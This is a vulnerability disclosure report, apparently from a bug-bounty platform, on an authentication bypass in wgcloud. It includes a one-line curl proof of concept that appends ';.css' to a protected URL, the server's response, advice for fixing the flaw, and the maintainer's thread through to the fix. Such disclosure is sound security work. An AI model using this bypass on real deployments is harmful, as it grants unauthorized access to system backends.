Auth bypass via unproper use of getRequestURL() in tianshiyeben/wgcloud

Valid

Reported on

Mar 29th 2022


Description

The wgcloud uses getRequestURL() improperly, an attacker could craft an URL that bypasses the auth of wgcloud

Normally, when browsering http://[ip]:9999/wgcloud/dash/main with no auth, you will be redirected to /wgcloud/login/toLogin, but this vuln could bypass this.

Proof of Concept

curl  'http://[ip]:9999/wgcloud/dash/main;.css' 

HTTP/1.1 200 
Set-Cookie: JSESSIONID=00659E0197260C8DF3988AC21AA987CC; Path=/wgcloud; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Tue, 29 Mar 2022 14:36:24 GMT

while no auth is needed to get into the backend...

Impact

This vulnerability is capable of abusing the backend functions, while no auth is required. An attacker could retrieve sensitive infomation of the system via this vuln

Occurrences

indexof is not recommended, should be more accurate. Use @WebFilter(urlPatterns) instead, or config resource/static in application.properties

Don't use getRequestURL(), Use getServletPath() instead.

indexof is not recommended, should be more accurate. Use @WebFilter(urlPatterns) instead, or config resource/static in application.properties

We are processing your report and will contact the tianshiyeben/wgcloud team within 24 hours. 2 months ago
hi-unc1e modified the report
2 months ago
hi-unc1e modified the report
2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the tianshiyeben/wgcloud team and are waiting to hear back 2 months ago
tianshiyeben/wgcloud maintainer has acknowledged this report 2 months ago
tianshiyeben
2 months ago

Maintainer


Thank you very much for your suggestions. I already know how to fix it and have started to make some updates

hi-unc1e
a month ago

Researcher


OK, can you update the status of this issue? So that a vulnerability serial-number could be assigned, and we both can get some bonus.

tianshiyeben
a month ago

Maintainer


OK, give me a little more time. I haven't finished it yet. I'll update this status at that time

tianshiyeben
a month ago

Maintainer


Hello, excuse me, I now change the status to valid. Will this bug not be disclosed

hi-unc1e
a month ago

Researcher


It seems that @tianshiyeben don't want to disclose this vuln, I am not quite sure about it, let's ask admin about it Hi ,@admin what should we do if we want to keep this vuln private.

tianshiyeben
a month ago

Maintainer


ok,I still have some work to finish now. I want to wait some time

hi-unc1e
a month ago

Researcher


Okay, understood

tianshiyeben
a month ago

Maintainer


thank you

Jamie Slome
a month ago

Admin


You can go ahead and mark the report as valid. This will NOT make the report public. Only once you have marked it as fixed, will the report go public 👍

In short, if you tell us a report is fixed, it will be made public.

tianshiyeben validated this vulnerability a month ago

ok

hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the tianshiyeben/wgcloud team. We will try again in 7 days. a month ago
We have sent a second fix follow up to the tianshiyeben/wgcloud team. We will try again in 10 days. a month ago
tianshiyeben
a month ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it

tianshiyeben
a month ago

Maintainer


Thank you for your feedback and suggestions. I have fixed this bug and released it

Thank you again

tianshiyeben
a month ago

Maintainer


I found that I can't mark it as repaired. There is no response after clicking the button. Can the administrator help me @admin

tianshiyeben confirmed that a fix has been merged on 91f7cb a month ago
The fix bounty has been dropped
AuthRestFilter.java#L49 has been validated
AuthRestFilter.java#L45-L46 has been validated
AuthRestFilter.java#L56 has been validated
tianshiyeben
a month ago

Maintainer


ok I've marked it as fixed @admin

to join this conversation